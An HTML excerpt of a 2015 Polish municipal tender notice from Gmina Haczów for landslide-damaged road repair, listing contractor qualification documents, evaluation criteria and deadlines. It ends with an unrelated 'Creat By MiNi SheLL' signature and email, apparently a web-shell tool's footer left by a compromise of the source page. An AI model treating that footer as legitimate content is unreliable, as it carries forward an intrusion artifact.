<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się:
 a) wykonaniem w okresie ostatnich pięciu lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych związanych  z   wykonaniem  zabezpieczenia,  remontu  dróg  uszkodzonych  w  wyniku  działania  osuwisk) 
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
wykaz robót  budowlanych wykonanych  w okresie  ostatnich pięciu lat  przed upływem terminu składania ofert albo  wniosków  o  dopuszczenie  do  udziału  w  postępowaniu  , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, , wraz z podaniem  ich  rodzaju i wartości , daty i miejsca  wykonania oraz załączeniem dowodów dotyczących najważniejszych  robót, określających  czy roboty te  zostały wykonane w sposób należyty oraz  wskazujących czy zostały  wykonane  zgodnie  z  zasadami  sztuki  budowlanej i prawidłowo ukończone.
Dowodami są; poświadczenie. Jeżeli  z  uzasadnionych przyczyn  o obiektywnym charakterze wykonawca nie jest  w  stanie  uzyskać poświadczenia, składa inne  dokumenty.
W przypadku gdy zamawiający jest podmiotem  na rzecz którego  roboty  budowlane   wskazane  w  wykazie  zostały wcześniej  wykonane, wykonawca nie ma  obowiązku przedkładania  dowodów  wyżej wymienionych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje potencjałem technicznym na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje   osobami zdolnymi do wykonania zamówienia, jeżeli:

a) dysponuje osobą zdolną do wykonania zamówienia, która będzie uczestniczyć w wykonywaniu zamówienia, tj. osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej.
	
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie  robotami  budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadkach  przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą zamawiającego. Zmiana ta  ma być dokonana w drodze aneksu pisemnego  pod rygorem nieważności. Zmiany przewidziane w umowie mogą  być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany o których mowa  mogą dotyczyć:
a) osób odpowiedzialnych  z ramienia Wykonawcy i Zamawiającego do  koordynowania prowadzonych robót, 
b) danych adresowych  wykonawcy, 
c)wystąpienia siły wyższej, przy czym za siłę wyższą uważa się wszystkie zdarzenia, jakich nie da się przewidzieć w chwili zawarcia umowy i na które żadna ze stron nie będzie miała wpływu,  w szczególności: działania wojenne, rozruchy, klęska żywiołowa,
Możliwa  jest   również zmiana  wysokości  wynagrodzenia  wykonawcy   w  przypadku zmiany stawki podatku VAT, wysokości  minimalnego  wynagrodzenia  za  pracę  ustalonego   na  podstawie  art. 2  ust 3-5  ustawy  z  dnia  10  października 2002 r.  o minimalnym  wynagrodzeniu  za  pracę, zasad  podlegania  ubezpieczeniom  społecznym  lub ubezpieczeniu  zdrowotnemu  lub  wysokości  stawki  składki  na  ubezpieczenia   społeczne  lub    zdrowotne pod  warunkiem ze  w.w  zmiany  będą  miały  wpływ  na koszty  wykonania  zamówienia  przez  wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.haczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Haczów 36-213 Haczów Nr 573 , pokój  nr  15 ,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2015 godzina 08:30, miejsce: Urząd Gminy Haczów 36-213 Haczów Nr  573, pokój  nr  1 ,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com